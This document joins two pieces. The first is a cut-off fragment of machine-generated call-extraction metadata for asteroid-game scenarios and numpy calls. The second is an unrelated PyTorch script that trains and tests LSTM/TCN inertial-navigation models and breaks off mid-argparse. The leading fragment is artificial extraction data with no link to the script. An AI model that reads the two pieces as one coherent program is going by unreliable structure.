'position': (400, 300)}, seed=0)\n", (36679, 37652), False, 'from fuzzy_asteroids.util import Scenario\n'), ((38022, 41761), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""scenario_2_still_corridors"""', 'asteroid_states': "[{'position': (0, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (50, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (100, 250\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (150, 250),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (200, 250), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (250, 250), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (300, 250), 'angle': 0.0, 'speed':\n 0, 'size': 2}, {'position': (350, 250), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (0, 350), 'angle': 0.0, 'speed': 0, 'size': 2},\n {'position': (50, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (100, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (150, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (200, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (250, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (300, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (500, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (500, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 0), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (350, 50), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 100\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 150),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 200), 'angle':\n 0.0, 'speed': 0, 'size': 2}, 
{'position': (450, 0), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (450, 50), 'angle': 0.0, 'speed': \n 0, 'size': 2}, {'position': (450, 100), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (450, 150), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (450, 200), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 600), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 600), 'angle': 0.0, 'speed': 0, 'size': 2}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='scenario_2_still_corridors', asteroid_states=[{'position': (\n 0, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (50, 250),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (100, 250), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (150, 250), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (200, 250), 'angle': 0.0, 'speed':\n 0, 'size': 2}, {'position': (250, 250), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (300, 250), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (350, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (0, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (50, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (100, 350\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (150, 350),\n 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (200, 350), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (250, 350), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (300, 350), 'angle': 0.0, 'speed':\n 0, 'size': 2}, {'position': (350, 350), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (450, 250), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (500, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 250), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (500, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (550, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (600, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (650, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (700, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (750, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (800, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 0), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position':\n (350, 50), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 100\n ), 'angle': 0.0, 'speed': 0, 'size': 2}, {'position': (350, 150),\n 'angle': 0.0, 
'speed': 0, 'size': 2}, {'position': (350, 200), 'angle':\n 0.0, 'speed': 0, 'size': 2}, {'position': (450, 0), 'angle': 0.0,\n 'speed': 0, 'size': 2}, {'position': (450, 50), 'angle': 0.0, 'speed': \n 0, 'size': 2}, {'position': (450, 100), 'angle': 0.0, 'speed': 0,\n 'size': 2}, {'position': (450, 150), 'angle': 0.0, 'speed': 0, 'size': \n 2}, {'position': (450, 200), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (350, 600), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 350), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 400), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 450), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 500), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 550), 'angle': 0.0, 'speed': 0, 'size': 2}, {\n 'position': (450, 600), 'angle': 0.0, 'speed': 0, 'size': 2}],\n ship_state={'position': (400, 300)}, seed=0)\n", (38030, 41761), False, 'from fuzzy_asteroids.util import Scenario\n'), ((6500, 6529), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (6511, 6529), True, 'import numpy as np\n'), ((7042, 7071), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (7053, 7071), True, 'import numpy as np\n'), ((7585, 7614), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (7596, 7614), True, 'import numpy as np\n'), ((8112, 8141), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (8123, 8141), True, 'import numpy as np\n'), ((8662, 8691), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(17)'], {}), '(0, 2 * np.pi, 17)\n', (8673, 8691), True, 'import numpy as np\n'), ((6548, 6561), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (6554, 6561), True, 'import numpy as np\n'), ((6601, 6614), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (6607, 6614), True, 'import numpy as np\n'), ((7091, 7112), 'numpy.cos', 'np.cos', (['(angle + np.pi)'], {}), '(angle + np.pi)\n', (7097, 7112), True, 'import numpy as np\n'), ((7152, 7173), 'numpy.sin', 'np.sin', (['(angle + np.pi)'], {}), '(angle + np.pi)\n', (7158, 7173), True, 'import numpy as np\n'), ((7634, 7647), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (7640, 7647), True, 'import numpy as np\n'), ((7687, 7700), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (7693, 7700), True, 'import numpy as np\n'), ((8161, 8186), 'numpy.cos', 'np.cos', (['(angle + np.pi / 2)'], {}), '(angle + np.pi / 2)\n', (8167, 8186), True, 'import numpy as np\n'), ((8226, 8251), 'numpy.sin', 'np.sin', (['(angle + np.pi / 2)'], {}), '(angle + np.pi / 2)\n', (8232, 8251), True, 'import numpy as np\n'), ((8711, 8740), 'numpy.cos', 'np.cos', (['(angle + 3 * np.pi / 2)'], {}), '(angle + 3 * np.pi / 2)\n', (8717, 8740), True, 'import numpy as np\n'), ((8780, 8809), 'numpy.sin', 'np.sin', (['(angle + 3 * np.pi / 2)'], {}), '(angle + 3 * np.pi / 2)\n', (8786, 8809), True, 'import numpy as np\n')]
|
import json
import os
import sys
import time
from os import path as osp
from pathlib import Path
from shutil import copyfile
import numpy as np
import torch
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch.utils.data import DataLoader
from tqdm import tqdm
from model_temporal import LSTMSeqNetwork, BilinearLSTMSeqNetwork, TCNSeqNetwork
from utils import load_config, MSEAverageMeter
from data_glob_speed import GlobSpeedSequence, SequenceToSequenceDataset, SenseINSSequence
from transformations import ComposeTransform, RandomHoriRotateSeq
from metric import compute_absolute_trajectory_error, compute_relative_trajectory_error
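# Helper utilities for auto-generating train/validation/test list files from the
# folders found under a dataset root (used in __main__ below).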
def WriteList(path, name, folders):
with open(path+"/"+name, 'w') as f:
for folder in folders:
            f.write(folder + "\n")
def GetFolderName(path):
names = os.listdir(path+"/")
folders=[]
for name in names:
if os.path.isdir(os.path.join(os.path.abspath(path), name)):
folders.append(name)
folders.sort()
return folders
'''
Temporal models with loss functions in global coordinate frame
Configurations
- Model types
TCN - type=tcn
        LSTM_simple - type=lstm
        LSTM_bilinear - type=lstm_bi
'''
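# The 'file_system' sharing strategy avoids "too many open files" errors when tensors
# are exchanged between many DataLoader worker processes.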
torch.multiprocessing.set_sharing_strategy('file_system')
_nano_to_sec = 1e09
_input_channel, _output_channel = 6, 3
# _input_channel, _output_channel = 6, 2
device = 'cpu'
class GlobalPosLoss(torch.nn.Module):
def __init__(self, mode='full', history=None):
"""
Calculate position loss in global coordinate frame
Target :- Global Velocity
Prediction :- Global Velocity
"""
super(GlobalPosLoss, self).__init__()
self.mse_loss = torch.nn.MSELoss(reduction='none')
assert mode in ['full', 'part']
self.mode = mode
if self.mode == 'part':
assert history is not None
self.history = history
elif self.mode == 'full':
self.history = 1
def forward(self, pred, targ):
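        # Integrate per-frame global velocities into positions with a cumulative sum
        # (frame 0 is excluded so predictions and targets share the same origin).
        # In 'part' mode the loss is taken on displacements over sliding windows of
        # `history` frames rather than on the whole accumulated trajectory.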
gt_pos = torch.cumsum(targ[:, 1:, ], 1)
pred_pos = torch.cumsum(pred[:, 1:, ], 1)
if self.mode == 'part':
gt_pos = gt_pos[:, self.history:, :] - gt_pos[:, :-self.history, :]
pred_pos = pred_pos[:, self.history:, :] - pred_pos[:, :-self.history, :]
loss = self.mse_loss(pred_pos, gt_pos)
return torch.mean(loss)
def write_config(args, **kwargs):
if args.out_dir:
with open(osp.join(args.out_dir, 'config.json'), 'w') as f:
values = vars(args)
values['file'] = "pytorch_global_position"
if kwargs:
values['kwargs'] = kwargs
json.dump(values, f, sort_keys=True)
def get_dataset(root_dir, data_list, args, **kwargs):
input_format, output_format = [0, 3, 6], [0, _output_channel]
mode = kwargs.get('mode', 'train')
random_shift, shuffle, transforms, grv_only = 0, False, [], False
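    # Training windows get a random start offset and a random horizontal-rotation
    # augmentation; test mode keeps the original ordering and sets grv_only
    # (presumably restricting orientation to the game rotation vector).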
if mode == 'train':
random_shift = args.step_size // 2
shuffle = True
transforms.append(RandomHoriRotateSeq(input_format, output_format))
elif mode == 'val':
shuffle = True
elif mode == 'test':
shuffle = False
grv_only = True
transforms = ComposeTransform(transforms)
if args.dataset == 'ronin':
seq_type = GlobSpeedSequence
elif args.dataset == 'ridi':
from data_ridi import RIDIGlobSpeedSequence
seq_type = RIDIGlobSpeedSequence
elif args.dataset == 'sense':
seq_type = SenseINSSequence
dataset = SequenceToSequenceDataset(seq_type, root_dir, data_list, args.cache_path, args.step_size, args.window_size,
random_shift=random_shift, transform=transforms, shuffle=shuffle,
grv_only=grv_only, args=args, **kwargs)
return dataset
def get_dataset_from_list(root_dir, list_path, args, **kwargs):
with open(list_path) as f:
data_list = [s.strip().split(',')[0] for s in f.readlines() if len(s) > 0 and s[0] != '#']
return get_dataset(root_dir, data_list, args, **kwargs)
def get_model(args, **kwargs):
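    # Build the sequence model selected by --type. For the TCN the receptive field is
    # reported here and later reused as the loss history in train().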
config = {}
if kwargs.get('dropout'):
config['dropout'] = kwargs.get('dropout')
if args.type == 'tcn':
network = TCNSeqNetwork(_input_channel, _output_channel, args.kernel_size,
layer_channels=args.channels, **config)
print("TCN Network. Receptive field: {} ".format(network.get_receptive_field()))
elif args.type == 'lstm_bi':
print("Bilinear LSTM Network")
network = BilinearLSTMSeqNetwork(_input_channel, _output_channel, args.batch_size, device,
lstm_layers=args.layers, lstm_size=args.layer_size, **config).to(device)
else:
print("Simple LSTM Network")
network = LSTMSeqNetwork(_input_channel, _output_channel, args.batch_size, device,
lstm_layers=args.layers, lstm_size=args.layer_size, **config).to(device)
pytorch_total_params = sum(p.numel() for p in network.parameters() if p.requires_grad)
print('Network constructed. trainable parameters: {}'.format(pytorch_total_params))
return network
def get_loss_function(history, args, **kwargs):
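    # TCN: penalise displacement over sliding windows of `history` frames (its
    # receptive field); LSTMs: penalise the position error over the full window.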
if args.type == 'tcn':
config = {'mode': 'part',
'history': history}
else:
config = {'mode': 'full'}
criterion = GlobalPosLoss(**config)
return criterion
def format_string(*argv, sep=' '):
result = ''
for val in argv:
if isinstance(val, (tuple, list, np.ndarray)):
for v in val:
result += format_string(v, sep=sep) + sep
else:
result += str(val) + sep
return result[:-1]
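# Illustrative example (not part of the original source):
#   format_string('seq_01', 0.5, np.array([1.0, 2.0]), sep='\t')
#   returns 'seq_01\t0.5\t1.0\t2.0'; nested arrays/lists are flattened recursively.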
def train(args, **kwargs):
# Loading data
start_t = time.time()
train_dataset = get_dataset_from_list(args.root_dir, args.train_list, args, mode='train', **kwargs)
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, num_workers=args.num_workers, shuffle=True,
drop_last=True)
end_t = time.time()
print('Training set loaded. Time usage: {:.3f}s'.format(end_t - start_t))
val_dataset, val_loader = None, None
if args.val_list is not None:
val_dataset = get_dataset_from_list(args.validation_dir, args.val_list, args, mode='val', **kwargs)
val_loader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=True, drop_last=True)
print('Validation set loaded')
global device
device = torch.device(args.device if torch.cuda.is_available() else 'cpu')
if args.out_dir:
if not osp.isdir(args.out_dir):
os.makedirs(args.out_dir)
if not osp.isdir(osp.join(args.out_dir, 'checkpoints')):
os.makedirs(osp.join(args.out_dir, 'checkpoints'))
if not osp.isdir(osp.join(args.out_dir, 'logs')):
os.makedirs(osp.join(args.out_dir, 'logs'))
write_config(args, **kwargs)
print('\nNumber of train samples: {}'.format(len(train_dataset)))
train_mini_batches = len(train_loader)
if val_dataset:
print('Number of val samples: {}'.format(len(val_dataset)))
val_mini_batches = len(val_loader)
network = get_model(args, **kwargs).to(device)
history = network.get_receptive_field() if args.type == 'tcn' else args.window_size // 2
criterion = get_loss_function(history, args, **kwargs)
optimizer = torch.optim.Adam(network.parameters(), args.lr)
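    # ReduceLROnPlateau cuts the learning rate to 75% of its value after 10 epochs
    # without improvement; it is stepped with the validation loss below, so it only
    # takes effect when a validation list is provided.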
scheduler = ReduceLROnPlateau(optimizer, 'min', patience=10, factor=0.75, verbose=True, eps=1e-12)
quiet_mode = kwargs.get('quiet', False)
use_scheduler = kwargs.get('use_scheduler', False)
log_file = None
if args.out_dir:
log_file = osp.join(args.out_dir, 'logs', 'log.txt')
if osp.exists(log_file):
if args.continue_from is None:
os.remove(log_file)
else:
copyfile(log_file, osp.join(args.out_dir, 'logs', 'log_old.txt'))
start_epoch = 0
if args.continue_from is not None and osp.exists(args.continue_from):
with open(osp.join(str(Path(args.continue_from).parents[1]), 'config.json'), 'r') as f:
model_data = json.load(f)
if device.type == 'cpu':
checkpoints = torch.load(args.continue_from, map_location=lambda storage, location: storage)
else:
checkpoints = torch.load(args.continue_from, map_location={model_data['device']: args.device})
start_epoch = checkpoints.get('epoch', 0)
network.load_state_dict(checkpoints.get('model_state_dict'))
optimizer.load_state_dict(checkpoints.get('optimizer_state_dict'))
if kwargs.get('force_lr', False):
for param_group in optimizer.param_groups:
param_group['lr'] = args.lr
step = 0
best_val_loss = np.inf
train_errs = np.zeros(args.epochs)
print("Starting from epoch {}".format(start_epoch
))
try:
for epoch in range(start_epoch, args.epochs):
log_line = ''
network.train()
train_vel = MSEAverageMeter(3, [2], _output_channel)
train_loss = 0
start_t = time.time()
for bid, batch in tqdm(enumerate(train_loader)):
feat, targ, _, _ = batch
feat, targ = feat.to(device), targ.to(device)
optimizer.zero_grad()
predicted = network(feat)
train_vel.add(predicted.cpu().detach().numpy(), targ.cpu().detach().numpy())
loss = criterion(predicted, targ)
train_loss += loss.cpu().detach().numpy()
loss.backward()
optimizer.step()
step += 1
train_errs[epoch] = train_loss / train_mini_batches
end_t = time.time()
if not quiet_mode:
print('-' * 25)
                print('Epoch {}, time usage: {:.3f}s, loss: {}, train_vel_loss {}/{:.6f}'.format(
                    epoch, end_t - start_t, train_errs[epoch], train_vel.get_channel_avg(), train_vel.get_total_avg()))
print('Learning rate: {}'.format(optimizer.param_groups[0]['lr']))
log_line = format_string(log_line, epoch, optimizer.param_groups[0]['lr'], train_errs[epoch],
*train_vel.get_channel_avg())
saved_model = False
if val_loader:
network.eval()
val_vel = MSEAverageMeter(3, [2], _output_channel)
val_loss = 0
for bid, batch in tqdm(enumerate(val_loader)):
feat, targ, _, _ = batch
feat, targ = feat.to(device), targ.to(device)
optimizer.zero_grad()
pred = network(feat)
val_vel.add(pred.cpu().detach().numpy(), targ.cpu().detach().numpy())
val_loss += criterion(pred, targ).cpu().detach().numpy()
val_loss = val_loss / val_mini_batches
log_line = format_string(log_line, val_loss, *val_vel.get_channel_avg())
if not quiet_mode:
                    print('Validation loss: {}, val_vel_loss: {}/{:.6f}'.format(val_loss, val_vel.get_channel_avg(),
                                                                                val_vel.get_total_avg()))
if val_loss < best_val_loss:
best_val_loss = val_loss
saved_model = True
if args.out_dir:
model_path = osp.join(args.out_dir, 'checkpoints', 'checkpoint_%d.pt' % epoch)
torch.save({'model_state_dict': network.state_dict(),
'epoch': epoch,
'loss': train_errs[epoch],
'optimizer_state_dict': optimizer.state_dict()}, model_path)
print('Best Validation Model saved to ', model_path)
scheduler.step(val_loss)
            if args.out_dir and not saved_model and (epoch + 1) % args.save_interval == 0:  # periodic save even if validation did not improve
model_path = osp.join(args.out_dir, 'checkpoints', 'icheckpoint_%d.pt' % epoch)
torch.save({'model_state_dict': network.state_dict(),
'epoch': epoch,
'loss': train_errs[epoch],
'optimizer_state_dict': optimizer.state_dict()}, model_path)
print('Model saved to ', model_path)
if log_file:
log_line += '\n'
with open(log_file, 'a') as f:
f.write(log_line)
if np.isnan(train_loss):
print("Invalid value. Stopping training.")
break
except KeyboardInterrupt:
print('-' * 60)
print('Early terminate')
print('Training completed')
if args.out_dir:
model_path = osp.join(args.out_dir, 'checkpoints', 'checkpoint_latest.pt')
torch.save({'model_state_dict': network.state_dict(),
'epoch': epoch,
'optimizer_state_dict': optimizer.state_dict()}, model_path)
def recon_traj_with_preds_global(dataset, preds, ind=None, seq_id=0, type='preds', **kwargs):
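    # Reconstruct a trajectory from per-frame global velocities: scale by the mean frame
    # interval, anchor the first point at the ground-truth start position, then integrate
    # with a cumulative sum. Ground-truth trajectories are returned directly.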
    ind = ind if ind is not None else np.array([i[1] for i in dataset.index_map if i[0] == seq_id], dtype=int)
if type == 'gt':
# pos = dataset.gt_pos[seq_id][:, :2]
pos = dataset.gt_pos[seq_id][:, :3]
else:
ts = dataset.ts[seq_id]
# Compute the global velocity from local velocity.
dts = np.mean(ts[ind[1:]] - ts[ind[:-1]])
pos = preds * dts
# pos[0, :] = dataset.gt_pos[seq_id][0, :2]
pos[0, :] = dataset.gt_pos[seq_id][0, :3]
pos = np.cumsum(pos, axis=0)
veloc = preds
ori = dataset.orientations[seq_id]
return pos, veloc, ori
def test(args, **kwargs):
global device, _output_channel
import matplotlib.pyplot as plt
device = torch.device(args.device if torch.cuda.is_available() else 'cpu')
if args.test_path is not None:
if args.test_path[-1] == '/':
args.test_path = args.test_path[:-1]
root_dir = osp.split(args.test_path)[0]
test_data_list = [osp.split(args.test_path)[1]]
elif args.test_list is not None:
root_dir = args.root_dir if args.root_dir else osp.split(args.test_list)[0]
with open(args.test_list) as f:
test_data_list = [s.strip().split(',')[0] for s in f.readlines() if len(s) > 0 and s[0] != '#']
else:
raise ValueError('Either test_path or test_list must be specified.')
# Load the first sequence to update the input and output size
_ = get_dataset(root_dir, [test_data_list[0]], args, mode='test')
if args.out_dir and not osp.exists(args.out_dir):
os.makedirs(args.out_dir)
with open(osp.join(str(Path(args.model_path).parents[1]), 'config.json'), 'r') as f:
model_data = json.load(f)
if device.type == 'cpu':
checkpoint = torch.load(args.model_path, map_location=lambda storage, location: storage)
else:
checkpoint = torch.load(args.model_path, map_location={model_data['device']: args.device})
network = get_model(args, **kwargs)
network.load_state_dict(checkpoint.get('model_state_dict'))
network.eval().to(device)
print('Model {} loaded to device {}.'.format(args.model_path, device))
log_file = None
if args.test_list and args.out_dir:
log_file = osp.join(args.out_dir, osp.split(args.test_list)[-1].split('.')[0] + '_log.txt')
with open(log_file, 'w') as f:
f.write(args.model_path + '\n')
f.write('Seq traj_len velocity ate rte\n')
losses_vel = MSEAverageMeter(2, [1], _output_channel)
ate_all, rte_all = [], []
pred_per_min = 200 * 60
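    # Predictions per minute assuming the default 200 Hz sample rate; used as the
    # window length (delta) for the relative trajectory error below.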
seq_dataset = get_dataset(root_dir, test_data_list, args, mode='test', **kwargs)
for idx, data in enumerate(test_data_list):
assert data == osp.split(seq_dataset.data_path[idx])[1]
feat, vel = seq_dataset.get_test_seq(idx)
feat = torch.Tensor(feat).to(device)
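        # The network can emit more frames than there are velocity targets (e.g. warm-up
        # or padding), so keep only the trailing vel.shape[0] predictions.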
preds = np.squeeze(network(feat).cpu().detach().numpy())[-vel.shape[0]:, :_output_channel]
ind = np.arange(vel.shape[0])
val_losses = np.mean((vel - preds) ** 2, axis=0)
losses_vel.add(vel, preds)
print('Reconstructing trajectory')
pos_pred, gv_pred, _ = recon_traj_with_preds_global(seq_dataset, preds, ind=ind, type='pred', seq_id=idx)
pos_gt, gv_gt, _ = recon_traj_with_preds_global(seq_dataset, vel, ind=ind, type='gt', seq_id=idx)
if args.out_dir is not None and osp.isdir(args.out_dir):
np.save(osp.join(args.out_dir, '{}_{}.npy'.format(data, args.type)),
np.concatenate([pos_pred, pos_gt], axis=1))
ate = compute_absolute_trajectory_error(pos_pred, pos_gt)
if pos_pred.shape[0] < pred_per_min:
ratio = pred_per_min / pos_pred.shape[0]
rte = compute_relative_trajectory_error(pos_pred, pos_gt, delta=pos_pred.shape[0] - 1) * ratio
else:
rte = compute_relative_trajectory_error(pos_pred, pos_gt, delta=pred_per_min)
pos_cum_error = np.linalg.norm(pos_pred - pos_gt, axis=1)
ate_all.append(ate)
rte_all.append(rte)
print('Sequence {}, Velocity loss {} / {}, ATE: {}, RTE:{}'.format(data, val_losses, np.mean(val_losses), ate,
rte))
log_line = format_string(data, np.mean(val_losses), ate, rte)
if not args.fast_test:
kp = preds.shape[1]
if kp == 2:
targ_names = ['vx', 'vy']
elif kp == 3:
targ_names = ['vx', 'vy', 'vz']
plt.figure('{}'.format(data), figsize=(16, 9))
plt.subplot2grid((kp, 2), (0, 0), rowspan=kp - 1)
plt.plot(pos_pred[:, 0], pos_pred[:, 1])
plt.plot(pos_gt[:, 0], pos_gt[:, 1])
plt.title(data)
plt.axis('equal')
plt.legend(['Predicted', 'Ground truth'])
plt.subplot2grid((kp, 2), (kp - 1, 0))
plt.plot(pos_cum_error)
plt.legend(['ATE:{:.3f}, RTE:{:.3f}'.format(ate_all[-1], rte_all[-1])])
for i in range(kp):
plt.subplot2grid((kp, 2), (i, 1))
plt.plot(ind, preds[:, i])
plt.plot(ind, vel[:, i])
plt.legend(['Predicted', 'Ground truth'])
plt.title('{}, error: {:.6f}'.format(targ_names[i], val_losses[i]))
plt.tight_layout()
if args.show_plot:
plt.show()
if args.out_dir is not None and osp.isdir(args.out_dir):
plt.savefig(osp.join(args.out_dir, '{}_{}.png'.format(data, args.type)))
if log_file is not None:
with open(log_file, 'a') as f:
log_line += '\n'
f.write(log_line)
plt.close('all')
ate_all = np.array(ate_all)
rte_all = np.array(rte_all)
measure = format_string('ATE', 'RTE', sep='\t')
values = format_string(np.mean(ate_all), np.mean(rte_all), sep='\t')
print(measure, '\n', values)
if log_file is not None:
with open(log_file, 'a') as f:
f.write(measure + '\n')
f.write(values)
if __name__ == '__main__':
"""
Run file with individual arguments or/and config file. If argument appears in both config file and args,
args is given precedence.
"""
default_config_file = osp.abspath(osp.join(osp.abspath(__file__), '../../config/temporal_model_defaults.json'))
import argparse
parser = argparse.ArgumentParser(description="Run seq2seq model in train/test mode [required]. Optional "
"configurations can be specified as --key [value..] pairs",
add_help=True)
parser.add_argument('--config', type=str, help='Configuration file [Default: {}]'.format(default_config_file),
default=default_config_file)
# common
parser.add_argument('--type', type=str, choices=['tcn', 'lstm', 'lstm_bi'], help='Model type', default='lstm')
parser.add_argument('--root_dir', type=str, default="/data/INSData/ins_data_test/IDOL_SenseINS/building1/train_debug", help='Path to data directory')
parser.add_argument('--validation_dir', type=str, default="/data/INSData/ins_data_test/IDOL_SenseINS/building1/train_debug")
# parser.add_argument('--root_dir', type=str,
# default="/home/SENSETIME/xurunsen/project/ronin/RONIN/train_debug",
# help='Path to data directory')
# parser.add_argument('--validation_dir', type=str,
# default="/home/SENSETIME/xurunsen/project/ronin/RONIN/train_debug")
parser.add_argument('--cache_path', type=str, default=None)
parser.add_argument('--feature_sigma', type=float, help='Gaussian for smoothing features')
parser.add_argument('--target_sigma', type=float, help='Gaussian for smoothing target')
parser.add_argument('--window_size', type=int)
parser.add_argument('--step_size', type=int)
parser.add_argument('--batch_size', type=int)
parser.add_argument('--num_workers', type=int)
parser.add_argument('--out_dir', type=str, default='../output/ronin_lstm/idol/2021.05.14/train_debug')
parser.add_argument('--device', type=str, help='Cuda device (e.g:- cuda:0) or cpu')
parser.add_argument('--dataset', type=str, choices=['ronin', 'ridi', 'sense'], default='sense')
parser.add_argument('--imu_freq', type=int, default=200)
# tcn
tcn_cmd = parser.add_argument_group('tcn', 'configuration for TCN')
tcn_cmd.add_argument('--kernel_size', type=int)
tcn_cmd.add_argument('--channels', type=str, help='Channel sizes for TCN layers (comma separated)')
# lstm
lstm_cmd = parser.add_argument_group('lstm', 'configuration for LSTM')
lstm_cmd.add_argument('--layers', type=int)
lstm_cmd.add_argument('--layer_size', type=int)
mode = parser.add_subparsers(title='mode', dest='mode', help='Operation: [train] train model, [test] evaluate model')
mode.required = False
# train
train_cmd = mode.add_parser('train')
train_cmd.add_argument('--train_list', type=str)
train_cmd.add_argument('--val_list', type=str)
